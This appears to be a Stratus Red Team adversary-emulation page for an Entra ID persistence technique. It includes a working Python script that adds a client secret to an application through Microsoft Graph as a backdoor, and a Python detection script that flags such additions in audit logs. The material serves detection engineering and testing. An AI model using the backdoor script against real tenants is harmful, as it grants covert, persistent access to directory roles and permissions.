
Backdoor Entra ID application

Platform: Entra ID

MITRE ATT&CK Tactics

  • Persistence
  • Privilege Escalation

Description

Backdoors an existing Entra ID application by adding a new password credential (client secret) to it. Whoever holds that secret can authenticate as the application's service principal and use every directory role and API permission the application has been granted, without touching any user account.

Warm-up:

  • Create an Entra ID application and associated service principal
  • Assign it the Directory Readers role at the tenant level (for illustration purposes)

Detonation:

  • Backdoor the Entra ID application by creating a new password credential

Notes: The warm-up mimics what happens when you create an App Registration through the Azure portal. In the portal, creating an App Registration automatically creates the associated service principal. When using the Microsoft Graph API, the application object and the service principal are separate resources, so the service principal has to be created explicitly from the application's appId.
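The warm-up and detonation above expressed as the underlying Microsoft Graph calls. This is an added example, not Stratus Red Team's own implementation. It assumes a Graph access token with Application.ReadWrite.All and RoleManagement.ReadWrite.Directory in the GRAPH_TOKEN environment variable; the display names are illustrative.

```python
"""The warm-up and detonation above as Microsoft Graph calls.  Added example,
not Stratus Red Team's own implementation.  Assumes a Graph access token with
Application.ReadWrite.All and RoleManagement.ReadWrite.Directory in the
GRAPH_TOKEN environment variable; display names are illustrative."""
import json
import os
import urllib.request

GRAPH = "https://graph.microsoft.com/v1.0"
# Template ID of the built-in Directory Readers role; for built-in roles the
# unifiedRoleDefinition id equals the template id in every tenant.
DIRECTORY_READERS_TEMPLATE_ID = "88d8e3e3-8f55-4a1e-953a-9b9898b8876b"


def build_requests(app_display_name, credential_display_name):
    """Ordered (method, path, body) tuples.  {app_id}, {app_object_id} and
    {sp_object_id} are placeholders filled from earlier responses."""
    return [
        # Warm-up: the App Registration.  Unlike the portal, this does not
        # create the service principal.
        ("POST", "/applications", {"displayName": app_display_name}),
        # Warm-up: the service principal, created explicitly from the appId.
        ("POST", "/servicePrincipals", {"appId": "{app_id}"}),
        # Warm-up: Directory Readers at tenant scope ("/").
        ("POST", "/roleManagement/directory/roleAssignments", {
            "principalId": "{sp_object_id}",
            "roleDefinitionId": DIRECTORY_READERS_TEMPLATE_ID,
            "directoryScopeId": "/",
        }),
        # Detonation: add a password credential to the existing application.
        ("POST", "/applications/{app_object_id}/addPassword", {
            "passwordCredential": {"displayName": credential_display_name},
        }),
    ]


def fill_placeholders(value, ctx):
    """Substitute {name} placeholders in a path or (nested) request body."""
    if isinstance(value, str):
        return value.format(**ctx)
    if isinstance(value, dict):
        return {k: fill_placeholders(v, ctx) for k, v in value.items()}
    return value


def graph_call(token, method, path, body):
    """Send one JSON request to Graph and return the decoded response."""
    req = urllib.request.Request(
        GRAPH + path, method=method, data=json.dumps(body).encode(),
        headers={"Authorization": "Bearer " + token,
                 "Content-Type": "application/json"})
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read())


def run_sequence(token, app_display_name="stratus-demo-app",
                 credential_display_name="stratus-backdoor"):
    """Execute the four calls in order; return the new secret and the ids."""
    ctx = {}
    last = None
    for method, path, body in build_requests(app_display_name,
                                             credential_display_name):
        last = graph_call(token, method, fill_placeholders(path, ctx),
                          fill_placeholders(body, ctx))
        if path == "/applications":
            ctx["app_object_id"], ctx["app_id"] = last["id"], last["appId"]
        elif path == "/servicePrincipals":
            ctx["sp_object_id"] = last["id"]
    # secretText is returned only in the addPassword response and can never be
    # read back from the directory; an attacker has to capture it here.
    return last["secretText"], ctx


if __name__ == "__main__":
    secret, ids = run_sequence(os.environ["GRAPH_TOKEN"])
    print("backdoor secret issued for application", ids["app_object_id"])
```

The order matters: the role assignment needs the service principal's object id, and addPassword targets the application object (not the service principal), which is why the detonation's audit event is an application update.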

Instructions

Detonate with Stratus Red Team
stratus detonate entra-id.persistence.backdoor-application

Detection

Look for Entra ID audit log events (category ApplicationManagement) with the activity type Update application – Certificates and secrets management. The target resource is the modified application, and its modified properties list the credentials before and after the change, so a newly added entry of type Password is the signal. The same activity type also fires for secret removals, certificate changes and routine rotation, so triage on who initiated the change, whether that actor normally manages the application, and which roles or API permissions the application holds (here, Directory Readers). It covers the application object only; a credential added directly on the service principal object is logged under a different activity type and needs its own rule.
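The detection described above, run over a few audit log records, as an added example that is not part of the Stratus Red Team page. The record layout mirrors an Entra ID audit log export (activityDisplayName, result, initiatedBy, targetResources with modifiedProperties); the sample records are constructed, not from a real tenant, and the exact KeyDescription value format is an assumption.

```python
"""Flag audit-log events in which a password credential was added to an Entra ID
application.  Added example, not Stratus Red Team code.  Record layout mirrors an
Entra ID audit log export; the sample records are constructed and the
KeyDescription value format is assumed, not taken from the page."""
import json
import re

# The activity type is written with an en dash in the portal and exports; some
# SIEM pipelines normalise it to a hyphen, so accept both.
TARGET_ACTIVITY = re.compile(
    r"^Update application [\u2013-] Certificates and secrets management$")

# Constructed sample records.  Only the first adds a password credential.
SAMPLE_AUDIT_LOGS = [
    {   # a new client secret added to the app: should alert
        "activityDisplayName": "Update application \u2013 Certificates and secrets management",
        "category": "ApplicationManagement",
        "result": "success",
        "initiatedBy": {"user": {"userPrincipalName": "alice@example.com"}, "app": None},
        "targetResources": [{
            "displayName": "stratus-red-team-backdoor-app",
            "type": "Application",
            "modifiedProperties": [{
                "displayName": "KeyDescription",
                "oldValue": "[]",
                "newValue": '["[KeyIdentifier=11111111-1111-1111-1111-111111111111,'
                            'KeyType=Password,KeyUsage=Verify,DisplayName=backdoor]"]',
            }],
        }],
    },
    {   # a secret removed: same activity type, must not alert
        "activityDisplayName": "Update application - Certificates and secrets management",
        "category": "ApplicationManagement",
        "result": "success",
        "initiatedBy": {"user": None, "app": {"displayName": "rotation-automation"}},
        "targetResources": [{
            "displayName": "payroll-sync",
            "type": "Application",
            "modifiedProperties": [{
                "displayName": "KeyDescription",
                "oldValue": '["[KeyIdentifier=22222222-2222-2222-2222-222222222222,'
                            'KeyType=Password,KeyUsage=Verify,DisplayName=old]"]',
                "newValue": "[]",
            }],
        }],
    },
    {   # a certificate added: out of scope for this rule
        "activityDisplayName": "Update application \u2013 Certificates and secrets management",
        "category": "ApplicationManagement",
        "result": "success",
        "initiatedBy": {"user": {"userPrincipalName": "bob@example.com"}, "app": None},
        "targetResources": [{
            "displayName": "payroll-sync",
            "type": "Application",
            "modifiedProperties": [{
                "displayName": "KeyDescription",
                "oldValue": "[]",
                "newValue": '["[KeyIdentifier=33333333-3333-3333-3333-333333333333,'
                            'KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=CN=payroll]"]',
            }],
        }],
    },
]


def _key_entries(value):
    """Parse a KeyDescription old/new value into a set of credential strings."""
    if not value:
        return set()
    try:
        parsed = json.loads(value)
    except ValueError:
        return {value}
    return set(parsed) if isinstance(parsed, list) else {str(parsed)}


def _initiator(record):
    """Name the user or application that made the change."""
    who = record.get("initiatedBy") or {}
    if who.get("user"):
        return who["user"].get("userPrincipalName", "<unknown user>")
    if who.get("app"):
        return who["app"].get("displayName", "<unknown app>")
    return "<unknown>"


def find_new_password_credentials(records):
    """One finding per successful event that added a Password-type credential."""
    findings = []
    for rec in records:
        if not TARGET_ACTIVITY.match(rec.get("activityDisplayName", "")):
            continue
        if rec.get("result") != "success":
            continue
        for target in rec.get("targetResources", []):
            for prop in target.get("modifiedProperties", []):
                if prop.get("displayName") != "KeyDescription":
                    continue
                added = _key_entries(prop.get("newValue")) - _key_entries(prop.get("oldValue"))
                passwords = sorted(e for e in added if "KeyType=Password" in e)
                if passwords:
                    findings.append({"app": target.get("displayName"),
                                     "actor": _initiator(rec), "added": passwords})
    return findings


if __name__ == "__main__":
    for f in find_new_password_credentials(SAMPLE_AUDIT_LOGS):
        print(f"{f['actor']} added password credential(s) to {f['app']}: {f['added']}")
```

Diffing the old and new credential lists is what separates an added secret from a removal or a certificate change that shares the same activity type; the actor and application name are what the triage step in the text keys on.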